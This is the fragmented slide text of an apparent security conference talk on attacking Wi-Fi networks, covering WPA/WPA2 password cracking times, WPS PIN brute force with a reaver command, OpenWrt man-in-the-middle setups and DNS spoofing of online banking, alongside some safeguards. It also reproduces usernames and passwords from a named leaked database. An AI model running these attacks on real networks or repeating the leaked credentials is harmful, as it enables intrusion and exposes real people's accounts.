Modern Approaches to Wi-Fi Attacks: Attacker View BY KONRAD JĘDRZEJCZYK.

Modern Approaches to Wi-Fi Attacks: Attacker View

BY KONRAD JĘDRZEJCZYK

3

Whoami• Certified Offensive Security Wireless Professional (OSWP)

• Information Security Incident Response Analyst

Previously:

• Infrastructure Risk Analyst

• Security Incident Manager

• Information Security Forensic Expert

WHOAMI

Agenda 4

Agenda• WPA/WPA2 – is the hashing algorithm so insecure as we are led to believe?

• WPS – Weakest Possible Security approach

• OpenWRT = Wormhole attack + MitM +3G

• We're in! What next?

WPA/WPA2 – is the hashing algorithm so insecure as we are led to believe?

5

WPA/WPA2 ConnectionSupplicant (Client) Authenticator

Supplicant Random number (Snonce nonce generated by supplicant),

Message Integrity Code (MIC)Security parameters (RSN)

Authenticator Random Number (Anonce nonce generated by authenticator),

Authenticator MAC

Resend Random number,Encrypted by PTK

Confirm both PTK and GTK are installed

Pairwise Master Key (PMK)

Pairwise Transient Key (PTK)


6

WPA/WPA2 ConnectionU na ut he nti cat e d

U na ss oc iate d

A ut he nti cat e dU na ss oc iate d

A ut he nti cat e dA ss oc iat ed

D e au the n ti cati on

A ut he n tica tio n

(R e )as so ciati on

D e au the n ti cati on

D is as so cia tio n


7

Basic Package

8

Airodump-ng

OPENWRT WILL TURN CHEAP HARDWARE TO YOUR BEST WIFI CARD

9

Airgraph-ng


11

X = Cn

Where:

X - Number of combinations

C - Number of characters in a charset

n - Password range (>=8)

Example:

8 char lowercase alpha

[a-z or (not and) A-Z] = 268 = 208827064576

Example for Radeon HD6850 OC (49 kH/sek)

WPA/WPA2 Password Entropyn Charset Time

Single R290 (~140 kH/s) 8 [0-9] = 10 12 minutes 8 [a-z] or [A-Z] = 26 17 days 8 [a-z + 0-9] or [A-Z + 0-9] = 36 233 days 9 [a-z] or [A-Z] = 26 1 year and 83 days 9 [a-z + 0-9] or [A-Z + 0-9] = 36 23 years 8 a-z + A-Z + 0-9 = 62 50 years

12 x R270 (12 x ~100 kH/s)8 [a-z] or [A-Z] = 26 2 days 8 [a-z + 0-9] or [A-Z + 0-9] = 36 27 days 9 [a-z] or [A-Z] = 26 52 days

Single i5 CPU (~3,3 kH/s) depending on version8 [a-z] or [A-Z] = 26 2 years and 1 month


12

WPA/WPA2 Entropy in Practice


13

WPA/WPA2 Entropy in Practicepaulina Paulina paulina! Paulina! Paulina!@# ,(15011,

'andziulka19994',PaulinA!@# ,(15024, 'mariusz22',

paulina0 Paulina0 paulina0! Paulina0! PaUliNa0! ,(15003, 'demiano7'paulina1 Paulina1 paulina1! Paulina1! P@ulin@1! ,(15004, 'Lampka',

(...) (...) (...) (...) Paulina2o15! ,(15005, 'paradyne',paulina9 Paulina9 paulina9! Paulina9! paulinA1989! ,(15006, 'darek1054',

paulina!-! ,(15007, 'bandzior2911'

paulina10 Paulina10 paulina10! Paulina10! paulina19890101

,(15008, 'Ruthless blade',

paulina11 Paulina11 paulina11! Paulina11! 89Paulina! ,(15009, 'SzYbKi',(...) (...) (...) (...) 1paulina1 ,(15023, 'aramil23',

paulina99 Paulina99 paulina99! Paulina99! PaUlInA ,(15012, 'kasiq10',

.paulina ,(15013, 'diabelskapam'

paulina1970 Paulina1970 paulina1970

!Paulina197

0! paulinapaulina ,(15014, 'Janosik_13',

paulina1971 Paulina1971 paulina1971

!Paulina197

1! KonradPaulina ,(15015, 'Sztukens',

(...) (...) (...) (...) !!!PAULINA!!! ,(15016, 'superrolnik',paulina201

6 Paulina2016 paulina2016!

Paulina2016! PaulinaDefCamp ,(15017, 'Henry102',

Real passwords from stolen and publicly available sql file: www.pobieramy24.pl.sql


14

Any Help?

15

Don’t Underestimate the “Luck Factor”

http://zaufanatrzeciastrona.pl/wp-content/uploads/2014/02/superbowl.jpg


16

Possible Safeguards• Use non-standard passwords that are not present in password lists

– force them to a brute-force

• Think before creating a password


17

First described by Stefan Viehbock.

“When poor design meets poor implementation.”

Still, there is only 11,000 possible combinations.

reaver -i mon0 -b 0A:0B:0C:0D:0E:0F

44443338 checksum

PIN part 2 – 1000 possibilitiesPIN part 1 – 10000 possibilities

802.11 Auth802.11 AssocEAP initiation

Receive

Send M4

Increment 1st half of PIN

802.11 Deauth

Send M6

Increment 2nd half of PIN/fix checksum

Dump APConfiguration (M7)

M5

NACK

NACKReceive

M7

WPS – WiFi Protected Setup


18

Currently Implemented Safeguards• Limiting the number of attempts that can be made in a given timeframe

• Using a different PIN for every pairing attempt

• Limiting the pairing time

• Disabling WPS …however, there is a good chance that it will be disabled only in web api…

19

OpenWrt – Tool for Attacker

OPENWRT = WORMHOLE ATTACK + MITM +3G

20

OpenWrt – Tool for Attacker

http://wiki.openwrt.org/toh/startOPENWRT = WORMHOLE ATTACK + MITM +3G

21

Call to Arms


22

Post-Analysis


23

Post-Analysis


24

• airodump-ng

• airbase-ng

• airdecap-ng

• airmon-ng

• aireplay-ng

• airserv-ng

• tkiptun-ng

• sslstrip

• tcpdump

• ettercap

• … screen

AP

OpenWRT

You

FTP server

Comm-link

Wireless access point

Database server

Mail server

Switch

Laptop

Smart phone

Symbol Description

Legend Subtitle

Legend

OpenWrt – Everything You Need


25

AP

OpenWRT

Attacker

Victim

Internet Data

Classic MitM Attack


We're in! What next? 26

Social Engineering Toolkit


When We Want More: Hydra


http://3.bp.blogspot.com/

…or…


AP/RouterVictim Online BankingLegitimate DNS

AP/RouterVictim Online BankingLegitimate DNS

Attacker DNSFake Online Banking

MitM Session Data Feed

...and then:


What Can We Do about This?


What Can We Do about This?

http://www.aliexpress.com/item-img/Wi-Fi-Rm-Pro-Smart-home-Automation-Intelligent-Controller-Wireless-Smart-Remote-Controller-For-iPhone-6/32270548754.html


33

Thank You

• Q&A

Date post:	18-Jan-2016
Category:	Documents
Upload:	victor-hines
View:	219 times
Download:	1 times

Modern Approaches to Wi-Fi Attacks: Attacker View BY KONRAD JĘDRZEJCZYK.

Documents